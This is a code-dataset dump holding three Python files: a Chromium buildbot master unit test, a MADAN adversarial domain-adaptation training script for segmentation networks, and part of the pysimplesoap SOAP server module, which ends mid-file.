hexsha
stringlengths
40
40
size
int64
4
1.02M
ext
stringclasses
8 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
209
max_stars_repo_name
stringlengths
5
121
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
209
max_issues_repo_name
stringlengths
5
121
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
209
max_forks_repo_name
stringlengths
5
121
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
4
1.02M
avg_line_length
float64
1.07
66.1k
max_line_length
int64
4
266k
alphanum_fraction
float64
0.01
1
8eb604ab527630f6782f71fc57175248b93e85b4
8,019
py
Python
infra/libs/buildbot/test/master_test.py
asdfghjjklllllaaa/infra
8f63af54e46194cd29291813f2790ff6e986804d
[ "BSD-3-Clause" ]
1
2020-11-11T06:25:13.000Z
2020-11-11T06:25:13.000Z
infra/libs/buildbot/test/master_test.py
mcgreevy/chromium-infra
09064105713603f7bf75c772e8354800a1bfa256
[ "BSD-3-Clause" ]
21
2020-09-06T02:41:05.000Z
2022-03-02T04:40:01.000Z
infra/libs/buildbot/test/master_test.py
asdfghjjklllllaaa/infra
8f63af54e46194cd29291813f2790ff6e986804d
[ "BSD-3-Clause" ]
null
null
null
# Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import collections import json import os import requests import simplejson import subprocess from infra.libs.buildbot import master from testing_support import auto_stub DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data') class TestMasterInformation(auto_stub.TestCase): def setUp(self): super(TestMasterInformation, self).setUp() self.calls = [] self.master_data = [{ 'alt_port': 8211, 'buildbot_url': 'http://build.chromium.org/p/chromium.fyi/', 'dirname': 'master.chromium.fyi', 'fullhost': 'master1.golo.chromium.org', 'host': 'master1.golo', 'internal': False, 'name': 'ChromiumFYI', 'port': 8011, 'slave_port': 8111 }] def _handle_check_output(*args): self.calls.append(args[0]) return json.dumps(self.master_data) self.mock(subprocess, 'check_output', _handle_check_output) self.chromium_fyi = os.path.join(DATA_DIR, 'master.chromium.fyi') self.chromium_webkit = os.path.join(DATA_DIR, 'master.chromium.webkit') self.chromium_linux = os.path.join(DATA_DIR, 'master.chromium.linux') self.supersecret = os.path.join( DATA_DIR, 'build_internal', 'masters', 'master.chromium.supersecret') self.Response = collections.namedtuple('Response', ['status_code', 'json']) self.res = None self.requests_handler = lambda *_args, **_kwargs: self.res def testPidIsRunning(self): self.mock(master, '_pid_is_alive', lambda _x: True) self.assertTrue(master.buildbot_is_running(self.chromium_fyi)) def testPidIsNotRunning(self): self.mock(master, '_pid_is_alive', lambda _x: False) self.assertFalse(master.buildbot_is_running(self.chromium_fyi)) def testPidfileNotThere(self): # _pid_is_alive should not be called here and it is an error if it is. # pylint: disable=redundant-unittest-assert self.mock( master, '_pid_is_alive', lambda _x: self.assertTrue(False)) # pragma: no cover # There is no twistd.pid in chromium.webkit. self.assertFalse(master.buildbot_is_running(self.chromium_webkit)) def testNoActionsLog(self): last_boot = master.get_last_boot(self.chromium_webkit) self.assertIsNone(last_boot) def testGetLastBoot(self): last_boot = master.get_last_boot(self.chromium_fyi) # Apr 23 2015 11:01:40 PDT. self.assertEqual(last_boot, 1429812100) def testGetLastNoNewBuilds(self): last_no_new_builds = master.get_last_no_new_builds(self.chromium_fyi) # Apr 23 2015 11:01:50 PDT. self.assertEqual(last_no_new_builds, 1429812110) def testGetLastNoNewBuildsNotThere(self): last_no_new_builds = master.get_last_no_new_builds(self.chromium_webkit) self.assertIsNone(last_no_new_builds) def testGetLastNoNewBuildsButStarted(self): last_no_new_builds = master.get_last_no_new_builds(self.chromium_linux) self.assertIsNone(last_no_new_builds) def testGetLastBootNotThere(self): # 'make wait' is not in the sample actions.log. last_make_wait = master._get_last_action(self.chromium_fyi, 'make wait') self.assertIsNone(last_make_wait) def testMasterWebPort(self): master_port = master._get_master_web_port(self.chromium_fyi) self.assertEquals(master_port, 8011) self.assertEquals(len(self.calls), 1) # no cover due to a bug in coverage (http://stackoverflow.com/a/35325514) self.assertTrue(any(x.endswith('mastermap.py') for x in self.calls[0])) # pragma: no cover def testNoSuchMaster(self): master_port = master._get_master_web_port(self.chromium_webkit) self.assertIsNone(master_port) def testMasterMapInternal(self): master._get_master_web_port(self.supersecret) self.assertEquals(len(self.calls), 1) # no cover due to a bug in coverage (http://stackoverflow.com/a/35325514) self.assertTrue(any(x.endswith('mastermap_internal.py') for x in self.calls[0])) # pragma: no cover def testGetBuildstate(self): self.mock(requests, 'get', self.requests_handler) self.res = self.Response( status_code=200, json=lambda: { 'accepting_builds': True, 'builders': { 'test': { 'current_builds': 3, }, 'other': { 'current_builds': 1, }, 'empty': {}, }, }) accepting_builds, running_builds = master.get_varz(self.chromium_fyi) self.assertTrue(accepting_builds) self.assertEqual(running_builds, {'test': 3, 'other': 1}) def testNotAcceptingBuilds(self): self.mock(requests, 'get', self.requests_handler) self.res = self.Response( status_code=200, json=lambda: {'accepting_builds': False}) accepting_builds, _ = master.get_varz(self.chromium_fyi) self.assertFalse(accepting_builds) def testAcceptingBuildsNoMaster(self): accepting_builds, _ = master.get_varz(self.chromium_webkit) self.assertIsNone(accepting_builds) def testBadStatusCode(self): # We shouldn't get to the JSON function since we hit 404. # pylint: disable=redundant-unittest-assert self.res = self.Response( status_code=404, json=lambda: self.assertTrue(False)) # pragma: no cover self.mock(requests, 'get', self.requests_handler) accepting_builds, _ = master.get_varz(self.chromium_fyi) self.assertFalse(accepting_builds) def testBadJson(self): def raiser(): raise simplejson.scanner.JSONDecodeError('bad json', '', 0) self.res = self.Response( status_code=200, json=raiser) self.mock(requests, 'get', self.requests_handler) accepting_builds, _ = master.get_varz(self.chromium_fyi) self.assertFalse(accepting_builds) def testTimeout(self): def timeout(*_args, **_kwargs): raise requests.exceptions.Timeout('timeout') self.mock(requests, 'get', timeout) accepting_builds, _ = master.get_varz(self.chromium_fyi) self.assertIsNone(accepting_builds) def testConnectionErr(self): def timeout(*_args, **_kwargs): raise requests.exceptions.ConnectionError('error') self.mock(requests, 'get', timeout) accepting_builds, _ = master.get_varz(self.chromium_fyi) self.assertIsNone(accepting_builds) def testMastermapHost(self): masters = [ {'fullhost': 'bananas.cool'}, {'fullhost': 'bananas.cool'}, {'fullhost': 'bananas_dos.cool'}, ] self.mock(master, '_call_mastermap', lambda _x: masters) self.assertEqual( len(master.get_mastermap_for_host('fake', 'bananas.cool')), 2) class TestMasterManipulation(auto_stub.TestCase): def setUp(self): super(TestMasterManipulation, self).setUp() self.chromium_fyi = os.path.join(DATA_DIR, 'master.chromium.fyi') def DISABLED_testWithGclientSyncEnabled(self): # pragma: no cover actions = list(master.convert_action_items_to_cli(( master.GclientSync, master.MakeStop, master.MakeWait, master.MakeStart, master.MakeNoNewBuilds), self.chromium_fyi, enable_gclient=True)) self.assertEquals( [a['cmd'] for a in actions], [ ['gclient', 'sync', '--reset', '--force', '--auto_rebase'], ['make', 'stop'], ['make', 'wait'], ['make', 'start'], ['make', 'no-new-builds'], ], ) def testWithGclientSyncDisabled(self): actions = list(master.convert_action_items_to_cli(( master.GclientSync, master.MakeStop), self.chromium_fyi)) self.assertEquals( [a['cmd'] for a in actions], [ ['make', 'stop'], ], ) def testInvalid(self): with self.assertRaises(ValueError): list(master.convert_action_items_to_cli((-100,), self.chromium_fyi))
34.123404
79
0.681506
ce66bb511d631a73acfb8472fe0a47fb976e50eb
14,835
py
Python
scripts/train_fcn_adda.py
Luodian/MADAN
7a2918da44f5203b72652bc4cba0e70057482114
[ "MIT" ]
150
2019-10-29T01:22:31.000Z
2022-02-16T02:09:31.000Z
scripts/train_fcn_adda.py
pikachusocute/MADAN
7a2918da44f5203b72652bc4cba0e70057482114
[ "MIT" ]
6
2020-01-05T16:56:51.000Z
2021-10-13T03:25:05.000Z
scripts/train_fcn_adda.py
pikachusocute/MADAN
7a2918da44f5203b72652bc4cba0e70057482114
[ "MIT" ]
23
2019-11-04T15:46:29.000Z
2022-01-16T09:10:01.000Z
import logging import os import os.path import sys from collections import deque from datetime import datetime import click import numpy as np import torch import torch.nn.functional as F from tensorboardX import SummaryWriter from torch.autograd import Variable sys.path.append('/nfs/project/libo_iMADAN') from cycada.data.adda_datasets import AddaDataLoader from cycada.models import get_model from cycada.models.models import models from cycada.models import Discriminator from cycada.util import config_logging from cycada.tools.util import make_variable, mmd_loss def check_label(label, num_cls): "Check that no labels are out of range" label_classes = np.unique(label.numpy().flatten()) label_classes = label_classes[label_classes < 255] if len(label_classes) == 0: print('All ignore labels') return False class_too_large = label_classes.max() > num_cls if class_too_large or label_classes.min() < 0: print('Labels out of bound') print(label_classes) return False return True def forward_pass(net, discriminator, im, requires_grad=False, discrim_feat=False): if discrim_feat: score, feat = net(im) dis_score = discriminator(feat) else: score = net(im) dis_score = discriminator(score) if not requires_grad: score = Variable(score.data, requires_grad=False) return score, dis_score def supervised_loss(score, label, weights=None): loss_fn_ = torch.nn.NLLLoss(weight=weights, reduction='mean', ignore_index=255) loss = loss_fn_(F.log_softmax(score, dim=1), label) return loss def discriminator_loss(score, target_val, lsgan=False): if lsgan: loss = 0.5 * torch.mean((score - target_val) ** 2) else: _, _, h, w = score.size() target_val_vec = Variable(target_val * torch.ones(1, h, w), requires_grad=False).long().cuda() loss = supervised_loss(score, target_val_vec) return loss def fast_hist(a, b, n): k = (a >= 0) & (a < n) return np.bincount(n * a[k].astype(int) + b[k], minlength=n ** 2).reshape(n, n) def seg_accuracy(score, label, num_cls): _, preds = torch.max(score.data, 1) hist = fast_hist(label.cpu().numpy().flatten(), preds.cpu().numpy().flatten(), num_cls) intersections = np.diag(hist) unions = (hist.sum(1) + hist.sum(0) - np.diag(hist) + 1e-8) * 100 acc = np.diag(hist).sum() / hist.sum() return intersections, unions, acc @click.command() @click.argument('output') @click.option('--dataset', required=True, multiple=True) @click.option('--datadir', default="", type=click.Path(exists=True)) @click.option('--lr', '-l', default=0.0001) @click.option('--momentum', '-m', default=0.9) @click.option('--batch', default=1) @click.option('--snapshot', '-s', default=5000) @click.option('--downscale', type=int) @click.option('--resize', default=None, type=int) @click.option('--crop_size', default=None, type=int) @click.option('--half_crop', default=None) @click.option('--cls_weights', type=click.Path(exists=True)) @click.option('--weights_discrim', type=click.Path(exists=True)) @click.option('--weights_init', type=click.Path(exists=True)) @click.option('--model', default='fcn8s', type=click.Choice(models.keys())) @click.option('--lsgan/--no_lsgan', default=False) @click.option('--num_cls', type=int, default=19) @click.option('--gpu', default='0') @click.option('--max_iter', default=10000) @click.option('--lambda_d', default=1.0) @click.option('--lambda_g', default=1.0) @click.option('--train_discrim_only', default=False) @click.option('--with_mmd_loss/--no_mmd_loss', default=False) @click.option('--discrim_feat/--discrim_score', default=False) @click.option('--weights_shared/--weights_unshared', default=False) @click.option('--data_flag', type=str, default=None) @click.option('--small', type=int, default=2) def main(output, dataset, datadir, lr, momentum, snapshot, downscale, cls_weights, gpu, weights_init, num_cls, lsgan, max_iter, lambda_d, lambda_g, train_discrim_only, weights_discrim, crop_size, weights_shared, discrim_feat, half_crop, batch, model, data_flag, resize, with_mmd_loss, small): # So data is sampled in consistent way np.random.seed(1336) torch.manual_seed(1336) logdir = 'runs/{:s}/{:s}_to_{:s}/lr{:.1g}_ld{:.2g}_lg{:.2g}'.format(model, dataset[0], dataset[1], lr, lambda_d, lambda_g) if weights_shared: logdir += '_weights_shared' else: logdir += '_weights_unshared' if discrim_feat: logdir += '_discrim_feat' else: logdir += '_discrim_score' logdir += '/' + datetime.now().strftime('%Y_%b_%d-%H:%M') writer = SummaryWriter(log_dir=logdir) os.environ['CUDA_VISIBLE_DEVICES'] = gpu config_logging() print('Train Discrim Only', train_discrim_only) if model == 'fcn8s': net = get_model(model, num_cls=num_cls, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat) else: net = get_model(model, num_cls=num_cls, finetune=True, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat) net.cuda() str_ids = gpu.split(',') gpu_ids = [] for str_id in str_ids: id = int(str_id) if id >= 0: gpu_ids.append(id) # set gpu ids if len(gpu_ids) > 0: torch.cuda.set_device(gpu_ids[0]) assert (torch.cuda.is_available()) net.to(gpu_ids[0]) net = torch.nn.DataParallel(net, gpu_ids) if weights_shared: net_src = net # shared weights else: net_src = get_model(model, num_cls=num_cls, finetune=True, pretrained=True, weights_init=weights_init, output_last_ft=discrim_feat) net_src.eval() # initialize Discrminator odim = 1 if lsgan else 2 idim = num_cls if not discrim_feat else 4096 print('Discrim_feat', discrim_feat, idim) print('Discriminator init weights: ', weights_discrim) discriminator = Discriminator(input_dim=idim, output_dim=odim, pretrained=not (weights_discrim == None), weights_init=weights_discrim).cuda() discriminator.to(gpu_ids[0]) discriminator = torch.nn.DataParallel(discriminator, gpu_ids) loader = AddaDataLoader(net.module.transform, dataset, datadir, downscale, resize=resize, crop_size=crop_size, half_crop=half_crop, batch_size=batch, shuffle=True, num_workers=16, src_data_flag=data_flag, small=small) print('dataset', dataset) # Class weighted loss? if cls_weights is not None: weights = np.loadtxt(cls_weights) else: weights = None # setup optimizers opt_dis = torch.optim.SGD(discriminator.module.parameters(), lr=lr, momentum=momentum, weight_decay=0.0005) opt_rep = torch.optim.SGD(net.module.parameters(), lr=lr, momentum=momentum, weight_decay=0.0005) iteration = 0 num_update_g = 0 last_update_g = -1 losses_super_s = deque(maxlen=100) losses_super_t = deque(maxlen=100) losses_dis = deque(maxlen=100) losses_rep = deque(maxlen=100) accuracies_dom = deque(maxlen=100) intersections = np.zeros([100, num_cls]) iu_deque = deque(maxlen=100) unions = np.zeros([100, num_cls]) accuracy = deque(maxlen=100) print('Max Iter:', max_iter) net.train() discriminator.train() loader.loader_src.dataset.__getitem__(0, debug=True) loader.loader_tgt.dataset.__getitem__(0, debug=True) while iteration < max_iter: for im_s, im_t, label_s, label_t in loader: if iteration == 0: print("IM S: {}".format(im_s.size())) print("Label S: {}".format(label_s.size())) print("IM T: {}".format(im_t.size())) print("Label T: {}".format(label_t.size())) if iteration > max_iter: break info_str = 'Iteration {}: '.format(iteration) if not check_label(label_s, num_cls): continue ########################### # 1. Setup Data Variables # ########################### im_s = make_variable(im_s, requires_grad=False) label_s = make_variable(label_s, requires_grad=False) im_t = make_variable(im_t, requires_grad=False) label_t = make_variable(label_t, requires_grad=False) ############################# # 2. Optimize Discriminator # ############################# # zero gradients for optimizer opt_dis.zero_grad() opt_rep.zero_grad() # extract features if discrim_feat: score_s, feat_s = net_src(im_s) score_s = Variable(score_s.data, requires_grad=False) f_s = Variable(feat_s.data, requires_grad=False) else: score_s = Variable(net_src(im_s).data, requires_grad=False) f_s = score_s dis_score_s = discriminator(f_s) if discrim_feat: score_t, feat_t = net(im_t) score_t = Variable(score_t.data, requires_grad=False) f_t = Variable(feat_t.data, requires_grad=False) else: score_t = Variable(net(im_t).data, requires_grad=False) f_t = score_t dis_score_t = discriminator(f_t) dis_pred_concat = torch.cat((dis_score_s, dis_score_t)) # prepare real and fake labels batch_t, _, h, w = dis_score_t.size() batch_s, _, _, _ = dis_score_s.size() dis_label_concat = make_variable( torch.cat( [torch.ones(batch_s, h, w).long(), torch.zeros(batch_t, h, w).long()] ), requires_grad=False) # compute loss for discriminator loss_dis = supervised_loss(dis_pred_concat, dis_label_concat) (lambda_d * loss_dis).backward() losses_dis.append(loss_dis.item()) # optimize discriminator opt_dis.step() # compute discriminator acc pred_dis = torch.squeeze(dis_pred_concat.max(1)[1]) dom_acc = (pred_dis == dis_label_concat).float().mean().item() accuracies_dom.append(dom_acc * 100.) # add discriminator info to log info_str += " domacc:{:0.1f} D:{:.3f}".format(np.mean(accuracies_dom), np.mean(losses_dis)) writer.add_scalar('loss/discriminator', np.mean(losses_dis), iteration) writer.add_scalar('acc/discriminator', np.mean(accuracies_dom), iteration) ########################### # Optimize Target Network # ########################### np.mean(accuracies_dom) > dom_acc_thresh dom_acc_thresh = 60 if train_discrim_only and np.mean(accuracies_dom) > dom_acc_thresh: os.makedirs(output, exist_ok=True) torch.save(discriminator.module.state_dict(), '{}/discriminator_abv60.pth'.format(output, iteration)) break if not train_discrim_only and np.mean(accuracies_dom) > dom_acc_thresh: last_update_g = iteration num_update_g += 1 if num_update_g % 1 == 0: print('Updating G with adversarial loss ({:d} times)'.format(num_update_g)) # zero out optimizer gradients opt_dis.zero_grad() opt_rep.zero_grad() # extract features if discrim_feat: score_t, feat_t = net(im_t) score_t = Variable(score_t.data, requires_grad=False) f_t = feat_t else: score_t = net(im_t) f_t = score_t # score_t = net(im_t) dis_score_t = discriminator(f_t) # create fake label batch, _, h, w = dis_score_t.size() target_dom_fake_t = make_variable(torch.ones(batch, h, w).long(), requires_grad=False) # compute loss for target net loss_gan_t = supervised_loss(dis_score_t, target_dom_fake_t) (lambda_g * loss_gan_t).backward() losses_rep.append(loss_gan_t.item()) writer.add_scalar('loss/generator', np.mean(losses_rep), iteration) # optimize target net opt_rep.step() # log net update info info_str += ' G:{:.3f}'.format(np.mean(losses_rep)) if (not train_discrim_only) and weights_shared and np.mean(accuracies_dom) > dom_acc_thresh: print('Updating G using source supervised loss.') # zero out optimizer gradients opt_dis.zero_grad() opt_rep.zero_grad() # extract features if discrim_feat: score_s, feat_s = net(im_s) else: score_s = net(im_s) loss_supervised_s = supervised_loss(score_s, label_s, weights=weights) if with_mmd_loss: print("Updating G using discrepancy loss") lambda_discrepancy = 0.1 loss_mmd = mmd_loss(feat_s, feat_t) * 0.5 + mmd_loss(score_s, score_t) * 0.5 loss_supervised_s += lambda_discrepancy * loss_mmd loss_supervised_s.backward() losses_super_s.append(loss_supervised_s.item()) info_str += ' clsS:{:.2f}'.format(np.mean(losses_super_s)) writer.add_scalar('loss/supervised/source', np.mean(losses_super_s), iteration) # optimize target net opt_rep.step() # compute supervised losses for target -- monitoring only!!!no backward() loss_supervised_t = supervised_loss(score_t, label_t, weights=weights) losses_super_t.append(loss_supervised_t.item()) info_str += ' clsT:{:.2f}'.format(np.mean(losses_super_t)) writer.add_scalar('loss/supervised/target', np.mean(losses_super_t), iteration) ########################### # Log and compute metrics # ########################### if iteration % 10 == 0 and iteration > 0: # compute metrics intersection, union, acc = seg_accuracy(score_t, label_t.data, num_cls) intersections = np.vstack([intersections[1:, :], intersection[np.newaxis, :]]) unions = np.vstack([unions[1:, :], union[np.newaxis, :]]) accuracy.append(acc.item() * 100) acc = np.mean(accuracy) mIoU = np.mean(np.maximum(intersections, 1) / np.maximum(unions, 1)) * 100 iu = (intersection / union) * 10000 iu_deque.append(np.nanmean(iu)) info_str += ' acc:{:0.2f} mIoU:{:0.2f}'.format(acc, np.mean(iu_deque)) writer.add_scalar('metrics/acc', np.mean(accuracy), iteration) writer.add_scalar('metrics/mIoU', np.mean(mIoU), iteration) logging.info(info_str) iteration += 1 ################ # Save outputs # ################ # every 500 iters save current model if iteration % 500 == 0: os.makedirs(output, exist_ok=True) if not train_discrim_only: torch.save(net.module.state_dict(), '{}/net-itercurr.pth'.format(output)) torch.save(discriminator.module.state_dict(), '{}/discriminator-itercurr.pth'.format(output)) # save labeled snapshots if iteration % snapshot == 0: os.makedirs(output, exist_ok=True) if not train_discrim_only: torch.save(net.module.state_dict(), '{}/net-iter{}.pth'.format(output, iteration)) torch.save(discriminator.module.state_dict(), '{}/discriminator-iter{}.pth'.format(output, iteration)) if iteration - last_update_g >= 3 * len(loader): print('No suitable discriminator found -- returning.') torch.save(net.module.state_dict(), '{}/net-iter{}.pth'.format(output, iteration)) iteration = max_iter # make sure outside loop breaks break writer.close() if __name__ == '__main__': main()
33.947368
133
0.670442
db81e31298f08579b22bb87e588bb0ef1ac23df3
25,405
py
Python
tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py
ls-2018/tips
1f5f5195d7181b5dd4616db02166f7f92c97f1cd
[ "MIT" ]
2
2019-05-07T03:08:25.000Z
2020-05-22T10:10:00.000Z
tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py
ls-2018/tips
1f5f5195d7181b5dd4616db02166f7f92c97f1cd
[ "MIT" ]
7
2020-05-22T13:29:42.000Z
2021-09-23T23:30:25.000Z
tornado_demo/web2py/gluon/contrib/pysimplesoap/server.py
ls-2018/py
1f5f5195d7181b5dd4616db02166f7f92c97f1cd
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by the # Free Software Foundation; either version 3, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License # for more details. """Pythonic simple SOAP Server implementation""" from __future__ import unicode_literals import sys if sys.version_info[0] < 3: is_py2 = True else: is_py2 = False unicode = str import datetime import sys import logging import warnings import re import traceback try: from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer except ImportError: from http.server import BaseHTTPRequestHandler, HTTPServer from . import __author__, __copyright__, __license__, __version__ from .simplexml import SimpleXMLElement, TYPE_MAP, Date, Decimal log = logging.getLogger(__name__) # Deprecated? NS_RX = re.compile(r'xmlns:(\w+)="(.+?)"') class SoapFault(Exception): def __init__(self, faultcode=None, faultstring=None, detail=None): self.faultcode = faultcode or self.__class__.__name__ self.faultstring = faultstring or '' self.detail = detail class SoapDispatcher(object): """Simple Dispatcher for SOAP Server""" def __init__(self, name, documentation='', action='', location='', namespace=None, prefix=False, soap_uri="http://schemas.xmlsoap.org/soap/envelope/", soap_ns='soap', namespaces={}, pretty=False, debug=False, **kwargs): """ :param namespace: Target namespace; xmlns=targetNamespace :param prefix: Prefix for target namespace; xmlns:prefix=targetNamespace :param namespaces: Specify additional namespaces; example: {'external': 'http://external.mt.moboperator'} :param pretty: Prettifies generated xmls :param debug: Use to add tracebacks in generated xmls. Multiple namespaces =================== It is possible to support multiple namespaces. You need to specify additional namespaces by passing `namespace` parameter. >>> dispatcher = SoapDispatcher( ... name = "MTClientWS", ... location = "http://localhost:8008/ws/MTClientWS", ... action = 'http://localhost:8008/ws/MTClientWS', # SOAPAction ... namespace = "http://external.mt.moboperator", prefix="external", ... documentation = 'moboperator MTClientWS', ... namespaces = { ... 'external': 'http://external.mt.moboperator', ... 'model': 'http://model.common.mt.moboperator' ... }, ... ns = True) Now the registered method must return node names with namespaces' prefixes. >>> def _multi_ns_func(self, serviceMsisdn): ... ret = { ... 'external:activateSubscriptionsReturn': [ ... {'model:code': '0'}, ... {'model:description': 'desc'}, ... ]} ... return ret Our prefixes will be changed to those used by the client. """ self.methods = {} self.name = name self.documentation = documentation self.action = action # base SoapAction self.location = location self.namespace = namespace # targetNamespace self.prefix = prefix self.soap_ns = soap_ns self.soap_uri = soap_uri self.namespaces = namespaces self.pretty = pretty self.debug = debug @staticmethod def _extra_namespaces(xml, ns): """Extends xml with extra namespaces. :param ns: dict with namespaceUrl:prefix pairs :param xml: XML node to modify """ if ns: _tpl = 'xmlns:%s="%s"' _ns_str = " ".join([_tpl % (prefix, uri) for uri, prefix in ns.items() if uri not in xml]) xml = xml.replace('/>', ' ' + _ns_str + '/>') return xml def register_function(self, name, fn, returns=None, args=None, doc=None, response_element_name=None): self.methods[name] = fn, returns, args, doc or getattr(fn, "__doc__", ""), response_element_name or '%sResponse' % name def response_element_name(self, method): return self.methods[method][4] def dispatch(self, xml, action=None, fault=None): """Receive and process SOAP call, returns the xml""" # a dict can be sent in fault to expose it to the caller # default values: prefix = self.prefix ret = None if fault is None: fault = {} soap_ns, soap_uri = self.soap_ns, self.soap_uri soap_fault_code = 'VersionMismatch' name = None # namespaces = [('model', 'http://model.common.mt.moboperator'), ('external', 'http://external.mt.moboperator')] _ns_reversed = dict(((v, k) for k, v in self.namespaces.items())) # Switch keys-values # _ns_reversed = {'http://external.mt.moboperator': 'external', 'http://model.common.mt.moboperator': 'model'} try: request = SimpleXMLElement(xml, namespace=self.namespace) # detect soap prefix and uri (xmlns attributes of Envelope) for k, v in request[:]: if v in ("http://schemas.xmlsoap.org/soap/envelope/", "http://www.w3.org/2003/05/soap-env", "http://www.w3.org/2003/05/soap-envelope",): soap_ns = request.attributes()[k].localName soap_uri = request.attributes()[k].value # If the value from attributes on Envelope is in additional namespaces elif v in self.namespaces.values(): _ns = request.attributes()[k].localName _uri = request.attributes()[k].value _ns_reversed[_uri] = _ns # update with received alias # Now we change 'external' and 'model' to the received forms i.e. 'ext' and 'mod' # After that we know how the client has prefixed additional namespaces decoded_xml = xml if is_py2 else xml.decode('utf8') ns = NS_RX.findall(decoded_xml) for k, v in ns: if v in self.namespaces.values(): _ns_reversed[v] = k soap_fault_code = 'Client' # parse request message and get local method method = request('Body', ns=soap_uri).children()(0) if action: # method name = action name = action[len(self.action) + 1:-1] prefix = self.prefix if not action or not name: # method name = input message name name = method.get_local_name() prefix = method.get_prefix() log.debug('dispatch method: %s', name) function, returns_types, args_types, doc, response_element_name = self.methods[name] log.debug('returns_types %s', returns_types) # de-serialize parameters (if type definitions given) if args_types: args = method.children().unmarshall(args_types) elif args_types is None: args = {'request': method} # send raw request else: args = {} # no parameters soap_fault_code = 'Server' # execute function ret = function(**args) log.debug('dispathed method returns: %s', ret) except SoapFault as e: fault.update({ 'faultcode': "%s.%s" % (soap_fault_code, e.faultcode), 'faultstring': e.faultstring, 'detail': e.detail }) except Exception: # This shouldn't be one huge try/except import sys etype, evalue, etb = sys.exc_info() log.error(traceback.format_exc()) if self.debug: detail = u''.join(traceback.format_exception(etype, evalue, etb)) detail += u'\n\nXML REQUEST\n\n' + xml.decode('UTF-8') else: detail = None fault.update({'faultcode': "%s.%s" % (soap_fault_code, etype.__name__), 'faultstring': evalue, 'detail': detail}) # build response message if not prefix: xml = """<%(soap_ns)s:Envelope xmlns:%(soap_ns)s="%(soap_uri)s"/>""" else: xml = """<%(soap_ns)s:Envelope xmlns:%(soap_ns)s="%(soap_uri)s" xmlns:%(prefix)s="%(namespace)s"/>""" xml %= { # a %= {} is a shortcut for a = a % {} 'namespace': self.namespace, 'prefix': prefix, 'soap_ns': soap_ns, 'soap_uri': soap_uri } # Now we add extra namespaces xml = SoapDispatcher._extra_namespaces(xml, _ns_reversed) # Change our namespace alias to that given by the client. # We put [('model', 'http://model.common.mt.moboperator'), ('external', 'http://external.mt.moboperator')] # mix it with {'http://external.mt.moboperator': 'ext', 'http://model.common.mt.moboperator': 'mod'} mapping = dict( ((k, _ns_reversed[v]) for k, v in self.namespaces.items())) # Switch keys-values and change value # and get {'model': u'mod', 'external': u'ext'} response = SimpleXMLElement(xml, namespace=self.namespace, namespaces_map=mapping, prefix=prefix) response['xmlns:xsi'] = "http://www.w3.org/2001/XMLSchema-instance" response['xmlns:xsd'] = "http://www.w3.org/2001/XMLSchema" body = response.add_child("%s:Body" % soap_ns, ns=False) if fault: # generate a Soap Fault (with the python exception) body.marshall("%s:Fault" % soap_ns, fault, ns=False) else: # return normal value res = body.add_child(self.response_element_name(name), ns=self.namespace) if not prefix: res['xmlns'] = self.namespace # add target namespace # serialize returned values (response) if type definition available if returns_types: # TODO: full sanity check of type structure (recursive) complex_type = isinstance(ret, dict) if complex_type: # check if type mapping correlates with return value types_ok = all([k in returns_types for k in ret.keys()]) if not types_ok: warnings.warn("Return value doesn't match type structure: " "%s vs %s" % (str(returns_types), str(ret))) if not complex_type or not types_ok: # backward compatibility for scalar and simple types res.marshall(list(returns_types.keys())[0], ret, ) else: # new style for complex classes for k, v in ret.items(): res.marshall(k, v) elif returns_types is None: # merge xmlelement returned res.import_node(ret) elif returns_types == {}: log.warning('Given returns_types is an empty dict.') return response.as_xml(pretty=self.pretty) # Introspection functions: def list_methods(self): """Return a list of aregistered operations""" return [(method, doc) for method, (function, returns, args, doc, response_element_name) in self.methods.items()] def help(self, method=None): """Generate sample request and response messages""" (function, returns, args, doc, response_element_name) = self.methods[method] xml = """ <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body><%(method)s xmlns="%(namespace)s"/></soap:Body> </soap:Envelope>""" % {'method': method, 'namespace': self.namespace} request = SimpleXMLElement(xml, namespace=self.namespace, prefix=self.prefix) if args: items = args.items() elif args is None: items = [('value', None)] else: items = [] for k, v in items: request(method).marshall(k, v, add_comments=True, ns=False) xml = """ <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body><%(response_element_name)s xmlns="%(namespace)s"/></soap:Body> </soap:Envelope>""" % {'response_element_name': response_element_name, 'namespace': self.namespace} response = SimpleXMLElement(xml, namespace=self.namespace, prefix=self.prefix) if returns: items = returns.items() elif args is None: items = [('value', None)] else: items = [] for k, v in items: response(response_element_name).marshall(k, v, add_comments=True, ns=False) return request.as_xml(pretty=True), response.as_xml(pretty=True), doc def wsdl(self): """Generate Web Service Description v1.1""" xml = """<?xml version="1.0"?> <wsdl:definitions name="%(name)s" targetNamespace="%(namespace)s" xmlns:tns="%(namespace)s" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" 